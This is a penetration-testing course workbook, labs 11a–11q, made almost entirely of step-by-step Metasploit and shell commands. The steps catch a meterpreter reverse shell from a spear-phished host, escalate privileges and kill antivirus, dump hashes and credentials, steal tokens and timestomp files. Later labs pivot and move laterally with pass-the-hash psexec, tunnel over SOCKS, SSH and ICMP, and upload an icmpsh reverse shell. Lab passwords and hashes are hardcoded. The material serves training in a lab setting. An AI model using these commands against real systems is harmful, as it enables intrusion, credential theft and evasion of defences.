Client-Side Enumeration

Lab 11a: Getting your shell

echo yourname > /home/strategicsec/yourname.txt cd /home/strategicsec/toolz/metasploit

./msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp set ExitOnSession true

set LHOST StrategicSec-Ubuntu-Tap0-IP set LPORT 7777

Strategic Security, Inc. © http://strategicsec.com/

exploit -j

Now you should only have to wait a few minutes and then you should see an incoming meterpreter session.

We'll simulate having spear-phished a victim.

After that you should see metasploit sending the exploit to the IP address of a Windows 7 host, and after that you should see a new session created.

You can list the active sessions by typing:

sessions -l

You can "interact" with any active session by typing sessions -i 3 (replace 3 with the session number you want to interact with)

sessions -i 1

You should now see Metasploit's meterpreter prompt.

Strategic Security, Inc. © http://strategicsec.com/

Lab 11b: Figure out who and where you are

meterpreter> sysinfo

meterpreter> getuid

Strategic Security, Inc. © http://strategicsec.com/

meterpreter> ipconfig

meterpreter> run post/windows/gather/checkvm

meterpreter> run get_local_subnets

Lab 11c: Escalate privileges and get hashes

Strategic Security, Inc. © http://strategicsec.com/

meterpreter> getsystem

meterpreter> getuid

meterpreter> run killav

Strategic Security, Inc. © http://strategicsec.com/

meterpreter> run post/windows/gather/hashdump

meterpreter> run post/windows/gather/credentials/credential_collector

Strategic Security, Inc. © http://strategicsec.com/

meterpreter> rev2self

meterpreter> getuid

Lab 11d: Escalate Enumerate the host you are on

meterpreter > run getcountermeasure

Strategic Security, Inc. © http://strategicsec.com/

meterpreter> run winenum

meterpreter > run post/windows/gather/enum_applications

meterpreter > run post/windows/gather/enum_logged_on_users

Strategic Security, Inc. © http://strategicsec.com/

meterpreter > run post/windows/gather/usb_history

Strategic Security, Inc. © http://strategicsec.com/

meterpreter > run post/windows/gather/enum_shares

meterpreter > run post/windows/gather/enum_snmp

Strategic Security, Inc. © http://strategicsec.com/

meterpreter> reg enumkey –k

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

Lab 11e: Steal Tokens

meterpreter > getsystem

meterpreter > use incognito

Strategic Security, Inc. © http://strategicsec.com/

meterpreter > list_tokens –u

Strategic Security, Inc. © http://strategicsec.com/

meterpreter > list_tokens –g

meterpreter > impersonate_token BUILTIN\\Users <-- choose who you want to impersonate but be sure to use 2 slashes in the name (ex: impersonate_token domain\\user)

meterpreter> getuid

Strategic Security, Inc. © http://strategicsec.com/

meterpreter> rev2self

Lab 11f: Prove access

meterpreter> upload /home/strategicsec/yourname.txt c:\\

meterpreter > timestomp C:\\yourname.txt -v

meterpreter > timestomp C:\\ yourname.txt -m "12/12/2013 12:12:13"

Strategic Security, Inc. © http://strategicsec.com/

meterpreter > timestomp C:\\ yourname.txt -v

Lab 11g: Enumerate the network you are on

meterpreter > run netenum

Strategic Security, Inc. © http://strategicsec.com/

meterpreter > run netenum -ps -r 10.10.30.0/24

Strategic Security, Inc. © http://strategicsec.com/

meterpreter > run post/windows/gather/arp_scanner RHOSTS=10.10.30.0/24

Lab 11h: Set up your Pivot

meterpreter > background <-- background the session You want to get back to this prompt:

msf exploit(handler) > back <--- you need to get to main msf> prompt

sessions -l <-- Find a session you want to pivot through (note the IP and session number)

Strategic Security, Inc. © http://strategicsec.com/

Lab 11i: Now set up Pivot with a route add

route print

route add 10.10.30.50 255.255.255.0 28 <-- Use correct session id (2), it may be 3, or 4 route print

route remove 10.10.30.50 255.255.255.0 28 <-- Use correct session id (2), it may be 3, or 4

route print <--- verify new route

Lab 11j: Scan through your Pivot

use auxiliary/scanner/portscan/tcp <-- Run aux modules through your pivot set THREADS 10

set RHOSTS set RHOSTS 10.10.30.60-70 <-- Keep changing this IP and re-running the scan until you find something you want to attack

set RPORTS 445 run

Strategic Security, Inc. © http://strategicsec.com/

Lab 11k: Lateral movement through your Pivot

use exploit/windows/smb/psexec set SMBUser Administrator

set SMBPass aad3b435b51404eeaad3b435b51404ee:cffcd2a85b83b1566e6a785a33f5d0cf set payload windows/meterpreter/reverse_tcp

set RHOST 10.10.30.63 set LHOST 10.10.5.235 set LPORT 5678

exploit

Strategic Security, Inc. © http://strategicsec.com/

Lab 11l: Pivot Persistence

***Update Metasploit installation

***make two meterpreter sessions

use exploit/windows/smb/psexec set SMBUser Administrator

set SMBPass aad3b435b51404eeaad3b435b51404ee:cffcd2a85b83b1566e6a785a33f5d0cf set RHOST 10.10.30.87

set LPORT 5678

set LHOST StrategicSec-Ubuntu-Tap0-IP exploit

Strategic Security, Inc. © http://strategicsec.com/

background

set RHOST 10.10.30.81 exploit

Strategic Security, Inc. © http://strategicsec.com/

background

use post/windows/manage/portproxy sessions -l

set session 2

Strategic Security, Inc. © http://strategicsec.com/

set local_port 9001 set local_address 0.0.0.0 set connect_port 9002

set connect_address 10.10.30.87 run

set session 1 set local_port 9002 set local_address 0.0.0.0 set connect_port 80

set connect_address 10.10.10.105 run

Strategic Security, Inc. © http://strategicsec.com/

test proxy

wget --server-response --spider 10.10.30.81:9001

Strategic Security, Inc. © http://strategicsec.com/

Lab 11m: Set up a Socks Proxy through your Pivot

use auxiliary/server/socks4a set SRVHOST 127.0.0.1 set SRVPORT 1080 run

Strategic Security, Inc. © http://strategicsec.com/

Open a new terminal

sudo vi /etc/proxychains.conf

Comment out the proxy_dns, change the 9050 (tor port) to the metasploit socks proxy port (1080) and save it.

socks4 127.0.0.1 1080

proxychains nmap -sT -PN -vv -sV --script=smb-os-discovery.nse -p 445 10.10.30.0/24

proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,1433,1521,3306,3389,8080,10000 10.10.30.0/24

Strategic Security, Inc. © http://strategicsec.com/

Lab 11n: SSH Tunneling

sudo vi /etc/proxychains.conf

change last line to socks4 127.0.0.1 9060

Strategic Security, Inc. © http://strategicsec.com/

check proxychains connection with proxychains wget 10.10.10.105 not working

connect to ssh

ssh -D 127.0.0.1:9060 [email protected]

Strategic Security, Inc. © http://strategicsec.com/

pass: mysql123

open new terminal and check again connection

Lab 11o: VPN Pivot

use exploit/multi/ssh/sshexec set PASSWORD mysql123 set RHOST 10.10.10.107

set PAYLOAD linux/x86/meterpreter/reverse_tcp set LHOST 10.10.5.235

set LPORT 4444 exploit

Strategic Security, Inc. © http://strategicsec.com/

meterpreter > portfwd add -l 2222 -p 22 -r 127.0.0.1 background

route add 10.10.10.0 255.255.255.0 1 sudo apt-get install sshuttle

sudo sshuttle -vr [email protected]:2222 0/0 password: mysql123

Strategic Security, Inc. © http://strategicsec.com/

test connection with http://www.whatismyip.com/

Strategic Security, Inc. © http://strategicsec.com/

Lab 11p: ICMP Tunneling

open msfconsole

use exploit/windows/smb/psexec

set payload windows/meterpreter/reverse_tcp set rhost 10.10.30.63

set lhost 10.10.5.235 set SMBUser Administrator

set SMBPass aad3b435b51404eeaad3b435b51404ee:cffcd2a85b83b1566e6a785a33f5d0cf exploit

open second console cd ~/toolz

git clone https://github.com/inquisb/icmpsh.git cd icmpsh

from meterpreter session meterpreter > getwd C:\Windows\system32 meterpreter > getlwd

/home/strategicsec/toolz/metasploit meterpreter > lcd ../icmpsh

meterpreter > getlwd

/home/strategicsec/toolz/icmpsh meterpreter > upload icmpsh.exe

[*] uploading : icmpsh.exe -> icmpsh.exe [*] uploaded : icmpsh.exe -> icmpsh.exe

Strategic Security, Inc. © http://strategicsec.com/

meterpreter > shell

C:\Windows\system32>icmpsh.exe -t 10.10.5.235 -d 500 -b 30 -s 128

exit from shell and meterpreter session return back to second console

sudo sysctl -w net.ipv4.icmp_echo_ignore_all=1 sudo python icmpsh_m.py 10.10.5.235 10.10.30.63 ipconfig

Strategic Security, Inc. © http://strategicsec.com/

Lab 11q: IPv6 to IPv4 Tunnel

Go to http://tunnelbroker.net and sign up for an account.

You will be emailed your account credentials.

route print netsh

interface ipv6 show interfaces

Strategic Security, Inc. © http://strategicsec.com/

add v6v4tunnel IP6Tunnel 192.168.1.9 216.218.224.42 add address IP6Tunnel 2001:470:1f0e:d9f::2

add route ::/0 IP6Tunnel 2001:470:1f0e:d9f::1

Reference:

http://www.cellstream.com/intranet/tipsandtricks/160-setting-up-a-6to4-tunnel-in-windows-7.html IPv6 Direct Access

Reference:

http://www.slideshare.net/AlexdeJong/direct-access-for-dummies

http://directaccess.richardhicks.com/2013/06/24/isatap-recommendations-for-directaccess-deployments/

Strategic Security, Inc. © http://strategicsec.com/

In document CyberWar-AOCO-2014 (Page 73-108)